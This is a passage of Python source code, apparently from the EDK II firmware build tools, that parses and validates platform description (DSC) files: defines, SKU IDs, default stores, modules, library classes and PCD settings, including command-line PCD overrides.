self._FlashDefinition = None
self._Prebuild = None
self._Postbuild = None
self._BuildNumber = None
self._MakefileName = None
self._BsBaseAddress = None
self._RtBaseAddress = None
self._SkuIds = None
self._Modules = None
self._LibraryInstances = None
self._LibraryClasses = None
self._Pcds = None
self._DecPcds = None
self._BuildOptions = None
self._ModuleTypeOptions = None
self._LoadFixAddress = None
self._RFCLanguages = None
self._ISOLanguages = None
self._VpdToolGuid = None
self._MacroDict = None
self.DefaultStores = None
## Get current effective macros
@property
def _Macros(self):
if self._MacroDict is None:
self._MacroDict = {}
self._MacroDict.update(GlobalData.gPlatformDefines)
self._MacroDict.update(GlobalData.gGlobalDefines)
self._MacroDict.update(GlobalData.gCommandLineDefines)
return self._MacroDict
## Get architecture
@property
def Arch(self):
return self._Arch
@property
def Dir(self):
return self.MetaFile.Dir
## Retrieve all information in [Defines] section
#
# (Retrieving all [Defines] information in one-shot is just to save time.)
#
def _GetHeaderInfo(self):
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch]
for Record in RecordList:
Name = Record[1]
# items defined in _PROPERTY_ don't need additional processing
# some special items in [Defines] section need special treatment
if Name == TAB_DSC_DEFINES_OUTPUT_DIRECTORY:
self._OutputDirectory = NormPath(Record[2], self._Macros)
if ' ' in self._OutputDirectory:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in OUTPUT_DIRECTORY",
File=self.MetaFile, Line=Record[-1],
ExtraData=self._OutputDirectory)
elif Name == TAB_DSC_DEFINES_FLASH_DEFINITION:
self._FlashDefinition = PathClass(NormPath(Record[2], self._Macros), GlobalData.gWorkspace)
ErrorCode, ErrorInfo = self._FlashDefinition.Validate('.fdf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=Record[-1],
ExtraData=ErrorInfo)
elif Name == TAB_DSC_PREBUILD:
PrebuildValue = Record[2]
if Record[2][0] == '"':
if Record[2][-1] != '"':
EdkLogger.error('build', FORMAT_INVALID, 'Missing double quotes in the end of %s statement.' % TAB_DSC_PREBUILD,
File=self.MetaFile, Line=Record[-1])
PrebuildValue = Record[2][1:-1]
self._Prebuild = PrebuildValue
elif Name == TAB_DSC_POSTBUILD:
PostbuildValue = Record[2]
if Record[2][0] == '"':
if Record[2][-1] != '"':
EdkLogger.error('build', FORMAT_INVALID, 'Missing double quotes in the end of %s statement.' % TAB_DSC_POSTBUILD,
File=self.MetaFile, Line=Record[-1])
PostbuildValue = Record[2][1:-1]
self._Postbuild = PostbuildValue
elif Name == TAB_DSC_DEFINES_SUPPORTED_ARCHITECTURES:
self._SupArchList = GetSplitValueList(Record[2], TAB_VALUE_SPLIT)
elif Name == TAB_DSC_DEFINES_BUILD_TARGETS:
self._BuildTargets = GetSplitValueList(Record[2])
elif Name == TAB_DSC_DEFINES_SKUID_IDENTIFIER:
if self._SkuName is None:
self._SkuName = Record[2]
if GlobalData.gSKUID_CMD:
self._SkuName = GlobalData.gSKUID_CMD
elif Name == TAB_DSC_DEFINES_PCD_INFO_GENERATION:
self._PcdInfoFlag = Record[2]
elif Name == TAB_DSC_DEFINES_PCD_VAR_CHECK_GENERATION:
self._VarCheckFlag = Record[2]
elif Name == TAB_FIX_LOAD_TOP_MEMORY_ADDRESS:
try:
self._LoadFixAddress = int (Record[2], 0)
except:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS %s is not valid dec or hex string" % (Record[2]))
elif Name == TAB_DSC_DEFINES_RFC_LANGUAGES:
if not Record[2] or Record[2][0] != '"' or Record[2][-1] != '"' or len(Record[2]) == 1:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'language code for RFC_LANGUAGES must have double quotes around it, for example: RFC_LANGUAGES = "en-us;zh-hans"',
File=self.MetaFile, Line=Record[-1])
LanguageCodes = Record[2][1:-1]
if not LanguageCodes:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'one or more RFC4646 format language code must be provided for RFC_LANGUAGES statement',
File=self.MetaFile, Line=Record[-1])
LanguageList = GetSplitValueList(LanguageCodes, TAB_SEMI_COLON_SPLIT)
# check whether there is empty entries in the list
if None in LanguageList:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'one or more empty language code is in RFC_LANGUAGES statement',
File=self.MetaFile, Line=Record[-1])
self._RFCLanguages = LanguageList
elif Name == TAB_DSC_DEFINES_ISO_LANGUAGES:
if not Record[2] or Record[2][0] != '"' or Record[2][-1] != '"' or len(Record[2]) == 1:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'language code for ISO_LANGUAGES must have double quotes around it, for example: ISO_LANGUAGES = "engchn"',
File=self.MetaFile, Line=Record[-1])
LanguageCodes = Record[2][1:-1]
if not LanguageCodes:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'one or more ISO639-2 format language code must be provided for ISO_LANGUAGES statement',
File=self.MetaFile, Line=Record[-1])
if len(LanguageCodes) % 3:
EdkLogger.error('build', FORMAT_NOT_SUPPORTED, 'bad ISO639-2 format for ISO_LANGUAGES',
File=self.MetaFile, Line=Record[-1])
LanguageList = []
for i in range(0, len(LanguageCodes), 3):
LanguageList.append(LanguageCodes[i:i + 3])
self._ISOLanguages = LanguageList
elif Name == TAB_DSC_DEFINES_VPD_TOOL_GUID:
#
# try to convert the GUID to a real UUID value to see whether the GUID format
# for VPD_TOOL_GUID is correct.
#
try:
uuid.UUID(Record[2])
except:
EdkLogger.error("build", FORMAT_INVALID, "Invalid GUID format for VPD_TOOL_GUID", File=self.MetaFile)
self._VpdToolGuid = Record[2]
elif Name in self:
self[Name] = Record[2]
# set _Header to non-None in order to avoid database re-querying
self._Header = 'DUMMY'
## Retrieve platform name
@property
def PlatformName(self):
if self._PlatformName is None:
if self._Header is None:
self._GetHeaderInfo()
if self._PlatformName is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No PLATFORM_NAME", File=self.MetaFile)
return self._PlatformName
@property
def Platform(self):
return self.PlatformName
## Retrieve file guid
@property
def Guid(self):
if self._Guid is None:
if self._Header is None:
self._GetHeaderInfo()
if self._Guid is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No PLATFORM_GUID", File=self.MetaFile)
return self._Guid
## Retrieve platform version
@property
def Version(self):
if self._Version is None:
if self._Header is None:
self._GetHeaderInfo()
if self._Version is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No PLATFORM_VERSION", File=self.MetaFile)
return self._Version
## Retrieve platform description file version
@property
def DscSpecification(self):
if self._DscSpecification is None:
if self._Header is None:
self._GetHeaderInfo()
if self._DscSpecification is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No DSC_SPECIFICATION", File=self.MetaFile)
return self._DscSpecification
## Retrieve OUTPUT_DIRECTORY
@property
def OutputDirectory(self):
if self._OutputDirectory is None:
if self._Header is None:
self._GetHeaderInfo()
if self._OutputDirectory is None:
self._OutputDirectory = os.path.join("Build", self._PlatformName)
return self._OutputDirectory
## Retrieve SUPPORTED_ARCHITECTURES
@property
def SupArchList(self):
if self._SupArchList is None:
if self._Header is None:
self._GetHeaderInfo()
if self._SupArchList is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No SUPPORTED_ARCHITECTURES", File=self.MetaFile)
return self._SupArchList
## Retrieve BUILD_TARGETS
@property
def BuildTargets(self):
if self._BuildTargets is None:
if self._Header is None:
self._GetHeaderInfo()
if self._BuildTargets is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No BUILD_TARGETS", File=self.MetaFile)
return self._BuildTargets
@property
def PcdInfoFlag(self):
if self._PcdInfoFlag is None or self._PcdInfoFlag.upper() == 'FALSE':
return False
elif self._PcdInfoFlag.upper() == 'TRUE':
return True
else:
return False
@property
def VarCheckFlag(self):
if self._VarCheckFlag is None or self._VarCheckFlag.upper() == 'FALSE':
return False
elif self._VarCheckFlag.upper() == 'TRUE':
return True
else:
return False
# # Retrieve SKUID_IDENTIFIER
@property
def SkuName(self):
if self._SkuName is None:
if self._Header is None:
self._GetHeaderInfo()
if self._SkuName is None:
self._SkuName = TAB_DEFAULT
return self._SkuName
## Override SKUID_IDENTIFIER
@SkuName.setter
def SkuName(self, Value):
self._SkuName = Value
@property
def FlashDefinition(self):
if self._FlashDefinition is None:
if self._Header is None:
self._GetHeaderInfo()
if self._FlashDefinition is None:
self._FlashDefinition = ''
return self._FlashDefinition
@property
def Prebuild(self):
if self._Prebuild is None:
if self._Header is None:
self._GetHeaderInfo()
if self._Prebuild is None:
self._Prebuild = ''
return self._Prebuild
@property
def Postbuild(self):
if self._Postbuild is None:
if self._Header is None:
self._GetHeaderInfo()
if self._Postbuild is None:
self._Postbuild = ''
return self._Postbuild
## Retrieve FLASH_DEFINITION
@property
def BuildNumber(self):
if self._BuildNumber is None:
if self._Header is None:
self._GetHeaderInfo()
if self._BuildNumber is None:
self._BuildNumber = ''
return self._BuildNumber
## Retrieve MAKEFILE_NAME
@property
def MakefileName(self):
if self._MakefileName is None:
if self._Header is None:
self._GetHeaderInfo()
if self._MakefileName is None:
self._MakefileName = ''
return self._MakefileName
## Retrieve BsBaseAddress
@property
def BsBaseAddress(self):
if self._BsBaseAddress is None:
if self._Header is None:
self._GetHeaderInfo()
if self._BsBaseAddress is None:
self._BsBaseAddress = ''
return self._BsBaseAddress
## Retrieve RtBaseAddress
@property
def RtBaseAddress(self):
if self._RtBaseAddress is None:
if self._Header is None:
self._GetHeaderInfo()
if self._RtBaseAddress is None:
self._RtBaseAddress = ''
return self._RtBaseAddress
## Retrieve the top address for the load fix address
@property
def LoadFixAddress(self):
if self._LoadFixAddress is None:
if self._Header is None:
self._GetHeaderInfo()
if self._LoadFixAddress is None:
self._LoadFixAddress = self._Macros.get(TAB_FIX_LOAD_TOP_MEMORY_ADDRESS, '0')
try:
self._LoadFixAddress = int (self._LoadFixAddress, 0)
except:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS %s is not valid dec or hex string" % (self._LoadFixAddress))
#
# If command line defined, should override the value in DSC file.
#
if 'FIX_LOAD_TOP_MEMORY_ADDRESS' in GlobalData.gCommandLineDefines:
try:
self._LoadFixAddress = int(GlobalData.gCommandLineDefines['FIX_LOAD_TOP_MEMORY_ADDRESS'], 0)
except:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS %s is not valid dec or hex string" % (GlobalData.gCommandLineDefines['FIX_LOAD_TOP_MEMORY_ADDRESS']))
if self._LoadFixAddress < 0:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is set to the invalid negative value 0x%x" % (self._LoadFixAddress))
if self._LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self._LoadFixAddress % 0x1000 != 0:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is set to the invalid unaligned 4K value 0x%x" % (self._LoadFixAddress))
return self._LoadFixAddress
## Retrieve RFCLanguage filter
@property
def RFCLanguages(self):
if self._RFCLanguages is None:
if self._Header is None:
self._GetHeaderInfo()
if self._RFCLanguages is None:
self._RFCLanguages = []
return self._RFCLanguages
## Retrieve ISOLanguage filter
@property
def ISOLanguages(self):
if self._ISOLanguages is None:
if self._Header is None:
self._GetHeaderInfo()
if self._ISOLanguages is None:
self._ISOLanguages = []
return self._ISOLanguages
## Retrieve the GUID string for VPD tool
@property
def VpdToolGuid(self):
if self._VpdToolGuid is None:
if self._Header is None:
self._GetHeaderInfo()
if self._VpdToolGuid is None:
self._VpdToolGuid = ''
return self._VpdToolGuid
## Retrieve [SkuIds] section information
@property
def SkuIds(self):
if self._SkuIds is None:
self._SkuIds = OrderedDict()
RecordList = self._RawData[MODEL_EFI_SKU_ID, self._Arch]
for Record in RecordList:
if not Record[0]:
EdkLogger.error('build', FORMAT_INVALID, 'No Sku ID number',
File=self.MetaFile, Line=Record[-1])
if not Record[1]:
EdkLogger.error('build', FORMAT_INVALID, 'No Sku ID name',
File=self.MetaFile, Line=Record[-1])
if not Pattern.match(Record[0]) and not HexPattern.match(Record[0]):
EdkLogger.error('build', FORMAT_INVALID, "The format of the Sku ID number is invalid. It only support Integer and HexNumber",
File=self.MetaFile, Line=Record[-1])
if not SkuIdPattern.match(Record[1]) or (Record[2] and not SkuIdPattern.match(Record[2])):
EdkLogger.error('build', FORMAT_INVALID, "The format of the Sku ID name is invalid. The correct format is '(a-zA-Z_)(a-zA-Z0-9_)*'",
File=self.MetaFile, Line=Record[-1])
self._SkuIds[Record[1].upper()] = (str(DscBuildData.ToInt(Record[0])), Record[1].upper(), Record[2].upper())
if TAB_DEFAULT not in self._SkuIds:
self._SkuIds[TAB_DEFAULT] = ("0", TAB_DEFAULT, TAB_DEFAULT)
if TAB_COMMON not in self._SkuIds:
self._SkuIds[TAB_COMMON] = ("0", TAB_DEFAULT, TAB_DEFAULT)
return self._SkuIds
@staticmethod
def ToInt(intstr):
return int(intstr, 16) if intstr.upper().startswith("0X") else int(intstr)
def _GetDefaultStores(self):
if self.DefaultStores is None:
self.DefaultStores = OrderedDict()
RecordList = self._RawData[MODEL_EFI_DEFAULT_STORES, self._Arch]
for Record in RecordList:
if not Record[0]:
EdkLogger.error('build', FORMAT_INVALID, 'No DefaultStores ID number',
File=self.MetaFile, Line=Record[-1])
if not Record[1]:
EdkLogger.error('build', FORMAT_INVALID, 'No DefaultStores ID name',
File=self.MetaFile, Line=Record[-1])
if not Pattern.match(Record[0]) and not HexPattern.match(Record[0]):
EdkLogger.error('build', FORMAT_INVALID, "The format of the DefaultStores ID number is invalid. It only support Integer and HexNumber",
File=self.MetaFile, Line=Record[-1])
if not IsValidWord(Record[1]):
EdkLogger.error('build', FORMAT_INVALID, "The format of the DefaultStores ID name is invalid. The correct format is '(a-zA-Z0-9_)(a-zA-Z0-9_-.)*'",
File=self.MetaFile, Line=Record[-1])
self.DefaultStores[Record[1].upper()] = (DscBuildData.ToInt(Record[0]), Record[1].upper())
if TAB_DEFAULT_STORES_DEFAULT not in self.DefaultStores:
self.DefaultStores[TAB_DEFAULT_STORES_DEFAULT] = (0, TAB_DEFAULT_STORES_DEFAULT)
GlobalData.gDefaultStores = sorted(self.DefaultStores.keys())
return self.DefaultStores
def OverrideDuplicateModule(self):
RecordList = self._RawData[MODEL_META_DATA_COMPONENT, self._Arch]
Macros = self._Macros
Components = {}
for Record in RecordList:
ModuleId = Record[6]
file_guid = self._RawData[MODEL_META_DATA_HEADER, self._Arch, None, ModuleId]
file_guid_str = file_guid[0][2] if file_guid else "NULL"
ModuleFile = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
if self._Arch != TAB_ARCH_COMMON and (file_guid_str,str(ModuleFile)) in Components:
self._RawData.DisableOverrideComponent(Components[(file_guid_str,str(ModuleFile))])
Components[(file_guid_str,str(ModuleFile))] = ModuleId
self._RawData._PostProcessed = False
## Retrieve packages this Platform depends on
@cached_property
def Packages(self):
RetVal = set()
RecordList = self._RawData[MODEL_META_DATA_PACKAGE, self._Arch]
Macros = self._Macros
for Record in RecordList:
File = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
# check the file validation
ErrorCode, ErrorInfo = File.Validate('.dec')
if ErrorCode != 0:
LineNo = Record[-1]
EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo, File=self.MetaFile, Line=LineNo)
# parse this package now. we need it to get protocol/ppi/guid value
RetVal.add(self._Bdb[File, self._Arch, self._Target, self._Toolchain])
return RetVal
## Retrieve [Components] section information
@property
def Modules(self):
if self._Modules is not None:
return self._Modules
self.OverrideDuplicateModule()
self._Modules = OrderedDict()
RecordList = self._RawData[MODEL_META_DATA_COMPONENT, self._Arch]
Macros = self._Macros
for Record in RecordList:
ModuleFile = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
ModuleId = Record[6]
LineNo = Record[7]
# check the file validation
ErrorCode, ErrorInfo = ModuleFile.Validate('.inf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=LineNo,
ExtraData=ErrorInfo)
Module = ModuleBuildClassObject()
Module.MetaFile = ModuleFile
# get module private library instance
RecordList = self._RawData[MODEL_EFI_LIBRARY_CLASS, self._Arch, None, ModuleId]
for Record in RecordList:
LibraryClass = Record[0]
LibraryPath = PathClass(NormPath(Record[1], Macros), GlobalData.gWorkspace, Arch=self._Arch)
LineNo = Record[-1]
# check the file validation
ErrorCode, ErrorInfo = LibraryPath.Validate('.inf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=LineNo,
ExtraData=ErrorInfo)
if LibraryClass == '' or LibraryClass == 'NULL':
self._NullLibraryNumber += 1
LibraryClass = 'NULL%d' % self._NullLibraryNumber
EdkLogger.verbose("Found forced library for %s\n\t%s [%s]" % (ModuleFile, LibraryPath, LibraryClass))
Module.LibraryClasses[LibraryClass] = LibraryPath
if LibraryPath not in self.LibraryInstances:
self.LibraryInstances.append(LibraryPath)
# get module private PCD setting
for Type in [MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, \
MODEL_PCD_FEATURE_FLAG, MODEL_PCD_DYNAMIC, MODEL_PCD_DYNAMIC_EX]:
RecordList = self._RawData[Type, self._Arch, None, ModuleId]
for TokenSpaceGuid, PcdCName, Setting, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
TokenList = GetSplitValueList(Setting)
DefaultValue = TokenList[0]
# the format is PcdName| Value | VOID* | MaxDatumSize
if len(TokenList) > 2:
MaxDatumSize = TokenList[2]
else:
MaxDatumSize = ''
TypeString = self._PCD_TYPE_STRING_[Type]
Pcd = PcdClassObject(
PcdCName,
TokenSpaceGuid,
TypeString,
'',
DefaultValue,
'',
MaxDatumSize,
{},
False,
None
)
Module.Pcds[PcdCName, TokenSpaceGuid] = Pcd
# get module private build options
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch, None, ModuleId]
for ToolChainFamily, ToolChain, Option, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
if (ToolChainFamily, ToolChain) not in Module.BuildOptions:
Module.BuildOptions[ToolChainFamily, ToolChain] = Option
else:
OptionString = Module.BuildOptions[ToolChainFamily, ToolChain]
Module.BuildOptions[ToolChainFamily, ToolChain] = OptionString + " " + Option
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch, None, ModuleId]
if RecordList:
if len(RecordList) != 1:
EdkLogger.error('build', OPTION_UNKNOWN, 'Only FILE_GUID can be listed in <Defines> section.',
File=self.MetaFile, ExtraData=str(ModuleFile), Line=LineNo)
ModuleFile = ProcessDuplicatedInf(ModuleFile, RecordList[0][2], GlobalData.gWorkspace)
ModuleFile.Arch = self._Arch
self._Modules[ModuleFile] = Module
return self._Modules
## Retrieve all possible library instances used in this platform
@property
def LibraryInstances(self):
if self._LibraryInstances is None:
self.LibraryClasses
return self._LibraryInstances
## Retrieve [LibraryClasses] information
@property
def LibraryClasses(self):
if self._LibraryClasses is None:
self._LibraryInstances = []
#
# tdict is a special dict-like type, used for selecting the correct
# library instance for a given library class and module type
#
LibraryClassDict = tdict(True, 3)
# track all library class names
LibraryClassSet = set()
RecordList = self._RawData[MODEL_EFI_LIBRARY_CLASS, self._Arch, None, -1]
Macros = self._Macros
for Record in RecordList:
LibraryClass, LibraryInstance, Dummy, Arch, ModuleType, Dummy, Dummy, LineNo = Record
if LibraryClass == '' or LibraryClass == 'NULL':
self._NullLibraryNumber += 1
LibraryClass = 'NULL%d' % self._NullLibraryNumber
EdkLogger.verbose("Found forced library for arch=%s\n\t%s [%s]" % (Arch, LibraryInstance, LibraryClass))
LibraryClassSet.add(LibraryClass)
LibraryInstance = PathClass(NormPath(LibraryInstance, Macros), GlobalData.gWorkspace, Arch=self._Arch)
# check the file validation
ErrorCode, ErrorInfo = LibraryInstance.Validate('.inf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=LineNo,
ExtraData=ErrorInfo)
if ModuleType != TAB_COMMON and ModuleType not in SUP_MODULE_LIST:
EdkLogger.error('build', OPTION_UNKNOWN, "Unknown module type [%s]" % ModuleType,
File=self.MetaFile, ExtraData=LibraryInstance, Line=LineNo)
LibraryClassDict[Arch, ModuleType, LibraryClass] = LibraryInstance
if LibraryInstance not in self._LibraryInstances:
self._LibraryInstances.append(LibraryInstance)
# resolve the specific library instance for each class and each module type
self._LibraryClasses = tdict(True)
for LibraryClass in LibraryClassSet:
# try all possible module types
for ModuleType in SUP_MODULE_LIST:
LibraryInstance = LibraryClassDict[self._Arch, ModuleType, LibraryClass]
if LibraryInstance is None:
continue
self._LibraryClasses[LibraryClass, ModuleType] = LibraryInstance
RecordList = self._RawData[MODEL_EFI_LIBRARY_INSTANCE, self._Arch]
for Record in RecordList:
File = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
LineNo = Record[-1]
# check the file validation
ErrorCode, ErrorInfo = File.Validate('.inf')
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, File=self.MetaFile, Line=LineNo,
ExtraData=ErrorInfo)
if File not in self._LibraryInstances:
self._LibraryInstances.append(File)
#
# we need the module name as the library class name, so we have
# to parse it here. (self._Bdb[] will trigger a file parse if it
# hasn't been parsed)
#
Library = self._Bdb[File, self._Arch, self._Target, self._Toolchain]
self._LibraryClasses[Library.BaseName, ':dummy:'] = Library
return self._LibraryClasses
def _ValidatePcd(self, PcdCName, TokenSpaceGuid, Setting, PcdType, LineNo):
if not self._DecPcds:
FdfInfList = []
if GlobalData.gFdfParser:
FdfInfList = GlobalData.gFdfParser.Profile.InfList
PkgSet = set()
for Inf in FdfInfList:
ModuleFile = PathClass(NormPath(Inf), GlobalData.gWorkspace, Arch=self._Arch)
if ModuleFile in self._Modules:
continue
ModuleData = self._Bdb[ModuleFile, self._Arch, self._Target, self._Toolchain]
PkgSet.update(ModuleData.Packages)
if self.Packages:
PkgSet.update(self.Packages)
self._DecPcds, self._GuidDict = GetDeclaredPcd(self, self._Bdb, self._Arch, self._Target, self._Toolchain, PkgSet)
self._GuidDict.update(GlobalData.gPlatformPcds)
if (PcdCName, TokenSpaceGuid) not in self._DecPcds:
EdkLogger.error('build', PARSER_ERROR,
"Pcd (%s.%s) defined in DSC is not declared in DEC files referenced in INF files in FDF. Arch: ['%s']" % (TokenSpaceGuid, PcdCName, self._Arch),
File=self.MetaFile, Line=LineNo)
ValueList, IsValid, Index = AnalyzeDscPcd(Setting, PcdType, self._DecPcds[PcdCName, TokenSpaceGuid].DatumType)
if not IsValid:
if PcdType not in [MODEL_PCD_FEATURE_FLAG, MODEL_PCD_FIXED_AT_BUILD]:
EdkLogger.error('build', FORMAT_INVALID, "Pcd format incorrect.", File=self.MetaFile, Line=LineNo,
ExtraData="%s.%s|%s" % (TokenSpaceGuid, PcdCName, Setting))
else:
if ValueList[2] == '-1':
EdkLogger.error('build', FORMAT_INVALID, "Pcd format incorrect.", File=self.MetaFile, Line=LineNo,
ExtraData="%s.%s|%s" % (TokenSpaceGuid, PcdCName, Setting))
if ValueList[Index]:
DatumType = self._DecPcds[PcdCName, TokenSpaceGuid].DatumType
if "{CODE(" not in ValueList[Index]:
try:
ValueList[Index] = ValueExpressionEx(ValueList[Index], DatumType, self._GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, Value, File=self.MetaFile, Line=LineNo,
ExtraData="PCD [%s.%s] Value \"%s\" " % (
TokenSpaceGuid, PcdCName, ValueList[Index]))
except EvaluationException as Excpt:
if hasattr(Excpt, 'Pcd'):
if Excpt.Pcd in GlobalData.gPlatformOtherPcds:
EdkLogger.error('Parser', FORMAT_INVALID, "Cannot use this PCD (%s) in an expression as"
" it must be defined in a [PcdsFixedAtBuild] or [PcdsFeatureFlag] section"
" of the DSC file" % Excpt.Pcd,
File=self.MetaFile, Line=LineNo)
else:
EdkLogger.error('Parser', FORMAT_INVALID, "PCD (%s) is not defined in DSC file" % Excpt.Pcd,
File=self.MetaFile, Line=LineNo)
else:
EdkLogger.error('Parser', FORMAT_INVALID, "Invalid expression: %s" % str(Excpt),
File=self.MetaFile, Line=LineNo)
if ValueList[Index]:
Valid, ErrStr = CheckPcdDatum(self._DecPcds[PcdCName, TokenSpaceGuid].DatumType, ValueList[Index])
if not Valid:
EdkLogger.error('build', FORMAT_INVALID, ErrStr, File=self.MetaFile, Line=LineNo,
ExtraData="%s.%s" % (TokenSpaceGuid, PcdCName))
if PcdType in (MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT, MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE):
if self._DecPcds[PcdCName, TokenSpaceGuid].DatumType.strip() != ValueList[1].strip():
DecPcd = self._DecPcds[PcdCName, TokenSpaceGuid]
EdkLogger.error('build', FORMAT_INVALID,
"Pcd datumtype used in DSC file is not the same as its declaration. DatumType:%s"%DecPcd.DatumType,
File=self.MetaFile, Line=LineNo,
ExtraData="Dsc:%s.%s|%s\n Dec:%s.%s|%s|%s|%s" % (TokenSpaceGuid, PcdCName, Setting, TokenSpaceGuid, \
PcdCName, DecPcd.DefaultValue, DecPcd.DatumType, DecPcd.TokenValue))
if (TokenSpaceGuid + '.' + PcdCName) in GlobalData.gPlatformPcds:
if GlobalData.gPlatformPcds[TokenSpaceGuid + '.' + PcdCName] != ValueList[Index]:
GlobalData.gPlatformPcds[TokenSpaceGuid + '.' + PcdCName] = ValueList[Index]
return ValueList
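## Filter PCD SKU information according to the platform's SKU usage
#
#   For a single-SKU platform, collapse the SKU information of each PCD to the
#   DEFAULT SKU; otherwise keep only the SKUs listed in [SkuIds].
#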
def _FilterPcdBySkuUsage(self, Pcds):
available_sku = self.SkuIdMgr.AvailableSkuIdSet
sku_usage = self.SkuIdMgr.SkuUsageType
if sku_usage == SkuClass.SINGLE:
for pcdname in Pcds:
pcd = Pcds[pcdname]
Pcds[pcdname].SkuInfoList = {TAB_DEFAULT:pcd.SkuInfoList[skuid] for skuid in pcd.SkuInfoList if skuid in available_sku}
if isinstance(pcd, StructurePcd) and pcd.SkuOverrideValues:
Pcds[pcdname].SkuOverrideValues = {TAB_DEFAULT:pcd.SkuOverrideValues[skuid] for skuid in pcd.SkuOverrideValues if skuid in available_sku}
else:
for pcdname in Pcds:
pcd = Pcds[pcdname]
Pcds[pcdname].SkuInfoList = {skuid:pcd.SkuInfoList[skuid] for skuid in pcd.SkuInfoList if skuid in available_sku}
if isinstance(pcd, StructurePcd) and pcd.SkuOverrideValues:
Pcds[pcdname].SkuOverrideValues = {skuid:pcd.SkuOverrideValues[skuid] for skuid in pcd.SkuOverrideValues if skuid in available_sku}
return Pcds
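## Complete the default-store entries of dynamic HII PCDs
#
#   If a SKU of an HII PCD does not define the TAB_DEFAULT_STORES_DEFAULT
#   store, copy the value of the minimal default store (DefaultStore.GetMin)
#   into that entry.
#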
def CompleteHiiPcdsDefaultStores(self, Pcds):
HiiPcd = [Pcds[pcd] for pcd in Pcds if Pcds[pcd].Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]]
DefaultStoreMgr = DefaultStore(self.DefaultStores)
for pcd in HiiPcd:
for skuid in pcd.SkuInfoList:
skuobj = pcd.SkuInfoList.get(skuid)
if TAB_DEFAULT_STORES_DEFAULT not in skuobj.DefaultStoreDict:
PcdDefaultStoreSet = set(defaultstorename for defaultstorename in skuobj.DefaultStoreDict)
mindefaultstorename = DefaultStoreMgr.GetMin(PcdDefaultStoreSet)
skuobj.DefaultStoreDict[TAB_DEFAULT_STORES_DEFAULT] = skuobj.DefaultStoreDict[mindefaultstorename]
return Pcds
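## Record the final values of structure PCDs overridden from the command line
#
#   For each structure PCD that was set with --pcd, copy its resolved default
#   (or HII default) value back into PcdValueFromComm.
#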
def RecoverCommandLinePcd(self):
def UpdateCommandLineValue(pcd):
if pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
pcd.PcdValueFromComm = pcd.DefaultValue
elif pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
pcd.PcdValueFromComm = pcd.SkuInfoList.get(TAB_DEFAULT).HiiDefaultValue
else:
pcd.PcdValueFromComm = pcd.SkuInfoList.get(TAB_DEFAULT).DefaultValue
for pcd in self._Pcds:
if isinstance(self._Pcds[pcd], StructurePcd) and (self._Pcds[pcd].PcdValueFromComm or self._Pcds[pcd].PcdFieldValueFromComm):
UpdateCommandLineValue(self._Pcds[pcd])
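## Parse the --pcd overrides given on the build command line
#
#   Resolve the token space GUID, token name and optional field name of each
#   override, normalize the value, store the result back into
#   GlobalData.BuildOptionPcd as (Guid, Name, Field, Value, From) tuples, and
#   drop field assignments that are superseded by a later whole-PCD assignment.
#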
def __ParsePcdFromCommandLine(self):
if GlobalData.BuildOptionPcd:
for i, pcd in enumerate(GlobalData.BuildOptionPcd):
if isinstance(pcd, tuple):
continue
(pcdname, pcdvalue) = pcd.split('=')
if not pcdvalue:
EdkLogger.error('build', AUTOGEN_ERROR, "No Value specified for the PCD %s." % (pcdname))
if '.' in pcdname:
(Name1, Name2) = pcdname.split('.', 1)
if "." in Name2:
(Name3, FieldName) = Name2.split(".", 1)
